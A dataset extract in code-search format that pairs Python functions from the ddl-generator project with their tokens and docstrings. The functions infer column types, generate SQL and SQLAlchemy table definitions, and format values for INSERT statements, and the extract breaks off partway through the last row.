repository_name
stringlengths 7
55
| func_path_in_repository
stringlengths 4
223
| func_name
stringlengths 1
134
| whole_func_string
stringlengths 75
104k
| language
stringclasses 1
value | func_code_string
stringlengths 75
104k
| func_code_tokens
sequencelengths 19
28.4k
| func_documentation_string
stringlengths 1
46.9k
| func_documentation_tokens
sequencelengths 1
1.97k
| split_name
stringclasses 1
value | func_code_url
stringlengths 87
315
|
---|---|---|---|---|---|---|---|---|---|---|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_coercable | def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst | python | def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst | [
"def",
"best_coercable",
"(",
"data",
")",
":",
"preference",
"=",
"(",
"datetime",
".",
"datetime",
",",
"bool",
",",
"int",
",",
"Decimal",
",",
"float",
",",
"str",
")",
"worst_pref",
"=",
"0",
"worst",
"=",
"''",
"for",
"datum",
"in",
"data",
":",
"coerced",
"=",
"coerce_to_specific",
"(",
"datum",
")",
"pref",
"=",
"preference",
".",
"index",
"(",
"type",
"(",
"coerced",
")",
")",
"if",
"pref",
">",
"worst_pref",
":",
"worst_pref",
"=",
"pref",
"worst",
"=",
"coerced",
"elif",
"pref",
"==",
"worst_pref",
":",
"if",
"isinstance",
"(",
"coerced",
",",
"Decimal",
")",
":",
"worst",
"=",
"worst_decimal",
"(",
"coerced",
",",
"worst",
")",
"elif",
"isinstance",
"(",
"coerced",
",",
"float",
")",
":",
"worst",
"=",
"max",
"(",
"coerced",
",",
"worst",
")",
"else",
":",
"# int, str",
"if",
"len",
"(",
"str",
"(",
"coerced",
")",
")",
">",
"len",
"(",
"str",
"(",
"worst",
")",
")",
":",
"worst",
"=",
"coerced",
"return",
"worst"
] | Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything' | [
"Given",
"an",
"iterable",
"of",
"scalar",
"data",
"returns",
"the",
"datum",
"representing",
"the",
"most",
"specific",
"data",
"type",
"the",
"list",
"overall",
"can",
"be",
"coerced",
"into",
"preferring",
"datetimes",
"then",
"bools",
"then",
"integers",
"then",
"decimals",
"then",
"floats",
"then",
"strings",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L215-L247 |
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | sqla_datatype_for | def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum)) | python | def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum)) | [
"def",
"sqla_datatype_for",
"(",
"datum",
")",
":",
"try",
":",
"if",
"len",
"(",
"_complex_enough_to_be_date",
".",
"findall",
"(",
"datum",
")",
")",
">",
"1",
":",
"dateutil",
".",
"parser",
".",
"parse",
"(",
"datum",
")",
"return",
"sa",
".",
"DATETIME",
"except",
"(",
"TypeError",
",",
"ValueError",
")",
":",
"pass",
"try",
":",
"(",
"prec",
",",
"scale",
")",
"=",
"precision_and_scale",
"(",
"datum",
")",
"return",
"sa",
".",
"DECIMAL",
"(",
"prec",
",",
"scale",
")",
"except",
"TypeError",
":",
"return",
"sa",
".",
"Unicode",
"(",
"len",
"(",
"datum",
")",
")"
] | Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14) | [
"Given",
"a",
"scalar",
"Python",
"value",
"picks",
"an",
"appropriate",
"SQLAlchemy",
"data",
"type",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L249-L270 |
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate_one | def generate_one(tbl, args, table_name=None, file=None):
"""
Prints code (SQL, SQLAlchemy, etc.) to define a table.
"""
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table | python | def generate_one(tbl, args, table_name=None, file=None):
"""
Prints code (SQL, SQLAlchemy, etc.) to define a table.
"""
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table | [
"def",
"generate_one",
"(",
"tbl",
",",
"args",
",",
"table_name",
"=",
"None",
",",
"file",
"=",
"None",
")",
":",
"table",
"=",
"Table",
"(",
"tbl",
",",
"table_name",
"=",
"table_name",
",",
"varying_length_text",
"=",
"args",
".",
"text",
",",
"uniques",
"=",
"args",
".",
"uniques",
",",
"pk_name",
"=",
"args",
".",
"key",
",",
"force_pk",
"=",
"args",
".",
"force_key",
",",
"reorder",
"=",
"args",
".",
"reorder",
",",
"data_size_cushion",
"=",
"args",
".",
"cushion",
",",
"save_metadata_to",
"=",
"args",
".",
"save_metadata_to",
",",
"metadata_source",
"=",
"args",
".",
"use_metadata_from",
",",
"loglevel",
"=",
"args",
".",
"log",
",",
"limit",
"=",
"args",
".",
"limit",
")",
"if",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'sqla'",
")",
":",
"if",
"not",
"args",
".",
"no_creates",
":",
"print",
"(",
"table",
".",
"sqlalchemy",
"(",
")",
",",
"file",
"=",
"file",
")",
"if",
"args",
".",
"inserts",
":",
"print",
"(",
"\"\\n\"",
".",
"join",
"(",
"table",
".",
"inserts",
"(",
"dialect",
"=",
"args",
".",
"dialect",
")",
")",
",",
"file",
"=",
"file",
")",
"elif",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'dj'",
")",
":",
"table",
".",
"django_models",
"(",
")",
"else",
":",
"print",
"(",
"table",
".",
"sql",
"(",
"dialect",
"=",
"args",
".",
"dialect",
",",
"inserts",
"=",
"args",
".",
"inserts",
",",
"creates",
"=",
"(",
"not",
"args",
".",
"no_creates",
")",
",",
"drops",
"=",
"args",
".",
"drops",
",",
"metadata_source",
"=",
"args",
".",
"use_metadata_from",
")",
",",
"file",
"=",
"file",
")",
"return",
"table"
] | Prints code (SQL, SQLAlchemy, etc.) to define a table. | [
"Prints",
"code",
"(",
"SQL",
"SQLAlchemy",
"etc",
".",
")",
"to",
"define",
"a",
"table",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L51-L70 |
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate | def generate(args=None, namespace=None, file=None):
"""
Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout)
"""
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file) | python | def generate(args=None, namespace=None, file=None):
"""
Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout)
"""
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file) | [
"def",
"generate",
"(",
"args",
"=",
"None",
",",
"namespace",
"=",
"None",
",",
"file",
"=",
"None",
")",
":",
"if",
"hasattr",
"(",
"args",
",",
"'split'",
")",
":",
"args",
"=",
"args",
".",
"split",
"(",
")",
"args",
"=",
"parser",
".",
"parse_args",
"(",
"args",
",",
"namespace",
")",
"set_logging",
"(",
"args",
")",
"logging",
".",
"info",
"(",
"str",
"(",
"args",
")",
")",
"if",
"args",
".",
"dialect",
"in",
"(",
"'pg'",
",",
"'pgsql'",
",",
"'postgres'",
")",
":",
"args",
".",
"dialect",
"=",
"'postgresql'",
"if",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'dj'",
")",
":",
"args",
".",
"dialect",
"=",
"'django'",
"elif",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'sqla'",
")",
":",
"args",
".",
"dialect",
"=",
"'sqlalchemy'",
"if",
"args",
".",
"dialect",
"not",
"in",
"dialect_names",
":",
"raise",
"NotImplementedError",
"(",
"'First arg must be one of: %s'",
"%",
"\", \"",
".",
"join",
"(",
"dialect_names",
")",
")",
"if",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"sqla_head",
",",
"file",
"=",
"file",
")",
"for",
"datafile",
"in",
"args",
".",
"datafile",
":",
"if",
"is_sqlalchemy_url",
".",
"search",
"(",
"datafile",
")",
":",
"table_names_for_insert",
"=",
"[",
"]",
"for",
"tbl",
"in",
"sqlalchemy_table_sources",
"(",
"datafile",
")",
":",
"t",
"=",
"generate_one",
"(",
"tbl",
",",
"args",
",",
"table_name",
"=",
"tbl",
".",
"generator",
".",
"name",
",",
"file",
"=",
"file",
")",
"if",
"t",
".",
"data",
":",
"table_names_for_insert",
".",
"append",
"(",
"tbl",
".",
"generator",
".",
"name",
")",
"if",
"args",
".",
"inserts",
"and",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"sqla_inserter_call",
"(",
"table_names_for_insert",
")",
",",
"file",
"=",
"file",
")",
"if",
"t",
"and",
"args",
".",
"inserts",
":",
"for",
"seq_update",
"in",
"emit_db_sequence_updates",
"(",
"t",
".",
"source",
".",
"db_engine",
")",
":",
"if",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"' conn.execute(\"%s\")'",
"%",
"seq_update",
",",
"file",
"=",
"file",
")",
"elif",
"args",
".",
"dialect",
"==",
"'postgresql'",
":",
"print",
"(",
"seq_update",
",",
"file",
"=",
"file",
")",
"else",
":",
"generate_one",
"(",
"datafile",
",",
"args",
",",
"file",
"=",
"file",
")"
] | Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout) | [
"Genereate",
"DDL",
"from",
"data",
"sources",
"named",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L72-L112 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | emit_db_sequence_updates | def emit_db_sequence_updates(engine):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if engine and engine.name == 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
'.' || c.relname || ';' AS qry,
n.nspname || '.' || c.relname AS qual_name
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
for (qry, qual_name) in list(conn.execute(qry)):
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval) | python | def emit_db_sequence_updates(engine):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if engine and engine.name == 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
'.' || c.relname || ';' AS qry,
n.nspname || '.' || c.relname AS qual_name
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
for (qry, qual_name) in list(conn.execute(qry)):
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval) | [
"def",
"emit_db_sequence_updates",
"(",
"engine",
")",
":",
"if",
"engine",
"and",
"engine",
".",
"name",
"==",
"'postgresql'",
":",
"# not implemented for other RDBMS; necessity unknown",
"conn",
"=",
"engine",
".",
"connect",
"(",
")",
"qry",
"=",
"\"\"\"SELECT 'SELECT last_value FROM ' || n.nspname ||\n '.' || c.relname || ';' AS qry,\n n.nspname || '.' || c.relname AS qual_name\n FROM pg_namespace n\n JOIN pg_class c ON (n.oid = c.relnamespace)\n WHERE c.relkind = 'S'\"\"\"",
"for",
"(",
"qry",
",",
"qual_name",
")",
"in",
"list",
"(",
"conn",
".",
"execute",
"(",
"qry",
")",
")",
":",
"(",
"lastval",
",",
")",
"=",
"conn",
".",
"execute",
"(",
"qry",
")",
".",
"first",
"(",
")",
"nextval",
"=",
"int",
"(",
"lastval",
")",
"+",
"1",
"yield",
"\"ALTER SEQUENCE %s RESTART WITH %s;\"",
"%",
"(",
"qual_name",
",",
"nextval",
")"
] | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | [
"Set",
"database",
"sequence",
"objects",
"to",
"match",
"the",
"source",
"db"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L557-L575 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.ddl | def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result) | python | def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result) | [
"def",
"ddl",
"(",
"self",
",",
"dialect",
"=",
"None",
",",
"creates",
"=",
"True",
",",
"drops",
"=",
"True",
")",
":",
"dialect",
"=",
"self",
".",
"_dialect",
"(",
"dialect",
")",
"creator",
"=",
"CreateTable",
"(",
"self",
".",
"table",
")",
".",
"compile",
"(",
"mock_engines",
"[",
"dialect",
"]",
")",
"creator",
"=",
"\"\\n\"",
".",
"join",
"(",
"l",
"for",
"l",
"in",
"str",
"(",
"creator",
")",
".",
"splitlines",
"(",
")",
"if",
"l",
".",
"strip",
"(",
")",
")",
"# remove empty lines",
"comments",
"=",
"\"\\n\\n\"",
".",
"join",
"(",
"self",
".",
"_comment_wrapper",
".",
"fill",
"(",
"\"in %s: %s\"",
"%",
"(",
"col",
",",
"self",
".",
"comments",
"[",
"col",
"]",
")",
")",
"for",
"col",
"in",
"self",
".",
"comments",
")",
"result",
"=",
"[",
"]",
"if",
"drops",
":",
"result",
".",
"append",
"(",
"self",
".",
"_dropper",
"(",
"dialect",
")",
"+",
"';'",
")",
"if",
"creates",
":",
"result",
".",
"append",
"(",
"\"%s;\\n%s\"",
"%",
"(",
"creator",
",",
"comments",
")",
")",
"for",
"child",
"in",
"self",
".",
"children",
".",
"values",
"(",
")",
":",
"result",
".",
"append",
"(",
"child",
".",
"ddl",
"(",
"dialect",
"=",
"dialect",
",",
"creates",
"=",
"creates",
",",
"drops",
"=",
"drops",
")",
")",
"return",
"'\\n\\n'",
".",
"join",
"(",
"result",
")"
] | Returns SQL to define the table. | [
"Returns",
"SQL",
"to",
"define",
"the",
"table",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L263-L281 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sqlalchemy | def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result | python | def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result | [
"def",
"sqlalchemy",
"(",
"self",
",",
"is_top",
"=",
"True",
")",
":",
"table_def",
"=",
"self",
".",
"table_backref_remover",
".",
"sub",
"(",
"''",
",",
"self",
".",
"table",
".",
"__repr__",
"(",
")",
")",
"# inject UNIQUE constraints into table definition",
"constraint_defs",
"=",
"[",
"]",
"for",
"constraint",
"in",
"self",
".",
"table",
".",
"constraints",
":",
"if",
"isinstance",
"(",
"constraint",
",",
"sa",
".",
"sql",
".",
"schema",
".",
"UniqueConstraint",
")",
":",
"col_list",
"=",
"', '",
".",
"join",
"(",
"\"'%s'\"",
"%",
"c",
".",
"name",
"for",
"c",
"in",
"constraint",
".",
"columns",
")",
"constraint_defs",
".",
"append",
"(",
"'UniqueConstraint(%s)'",
"%",
"col_list",
")",
"if",
"constraint_defs",
":",
"constraint_defs",
"=",
"',\\n '",
".",
"join",
"(",
"constraint_defs",
")",
"+",
"','",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"'schema=None'",
",",
"'\\n '",
"+",
"constraint_defs",
"+",
"'schema=None'",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"MetaData(bind=None)\"",
",",
"\"metadata\"",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"Column(\"",
",",
"\"\\n Column(\"",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"schema=\"",
",",
"\"\\n schema=\"",
")",
"result",
"=",
"[",
"table_def",
",",
"]",
"result",
".",
"extend",
"(",
"c",
".",
"sqlalchemy",
"(",
"is_top",
"=",
"False",
")",
"for",
"c",
"in",
"self",
".",
"children",
".",
"values",
"(",
")",
")",
"result",
"=",
"\"\\n%s = %s\"",
"%",
"(",
"self",
".",
"table_name",
",",
"\"\\n\"",
".",
"join",
"(",
"result",
")",
")",
"if",
"is_top",
":",
"sqla_imports",
"=",
"set",
"(",
"self",
".",
"capitalized_words",
".",
"findall",
"(",
"table_def",
")",
")",
"sqla_imports",
"&=",
"set",
"(",
"dir",
"(",
"sa",
")",
")",
"sqla_imports",
"=",
"sorted",
"(",
"sqla_imports",
")",
"result",
"=",
"self",
".",
"sqlalchemy_setup_template",
"%",
"(",
"\", \"",
".",
"join",
"(",
"sqla_imports",
")",
",",
"result",
",",
"self",
".",
"table",
".",
"name",
")",
"result",
"=",
"textwrap",
".",
"dedent",
"(",
"result",
")",
"return",
"result"
] | Dumps Python code to set up the table's SQLAlchemy model | [
"Dumps",
"Python",
"code",
"to",
"set",
"up",
"the",
"table",
"s",
"SQLAlchemy",
"model"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L292-L320 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table._prep_datum | def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum | python | def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum | [
"def",
"_prep_datum",
"(",
"self",
",",
"datum",
",",
"dialect",
",",
"col",
",",
"needs_conversion",
")",
":",
"if",
"datum",
"is",
"None",
"or",
"(",
"needs_conversion",
"and",
"not",
"str",
"(",
"datum",
")",
".",
"strip",
"(",
")",
")",
":",
"return",
"'NULL'",
"pytype",
"=",
"self",
".",
"columns",
"[",
"col",
"]",
"[",
"'pytype'",
"]",
"if",
"needs_conversion",
":",
"if",
"pytype",
"==",
"datetime",
".",
"datetime",
":",
"datum",
"=",
"dateutil",
".",
"parser",
".",
"parse",
"(",
"datum",
")",
"elif",
"pytype",
"==",
"bool",
":",
"datum",
"=",
"th",
".",
"coerce_to_specific",
"(",
"datum",
")",
"if",
"dialect",
".",
"startswith",
"(",
"'sqlite'",
")",
":",
"datum",
"=",
"1",
"if",
"datum",
"else",
"0",
"else",
":",
"datum",
"=",
"pytype",
"(",
"str",
"(",
"datum",
")",
")",
"if",
"isinstance",
"(",
"datum",
",",
"datetime",
".",
"datetime",
")",
"or",
"isinstance",
"(",
"datum",
",",
"datetime",
".",
"date",
")",
":",
"if",
"dialect",
"in",
"self",
".",
"_datetime_format",
":",
"return",
"datum",
".",
"strftime",
"(",
"self",
".",
"_datetime_format",
"[",
"dialect",
"]",
")",
"else",
":",
"return",
"\"'%s'\"",
"%",
"datum",
"elif",
"hasattr",
"(",
"datum",
",",
"'lower'",
")",
":",
"# simple SQL injection protection, sort of... ?",
"return",
"\"'%s'\"",
"%",
"datum",
".",
"replace",
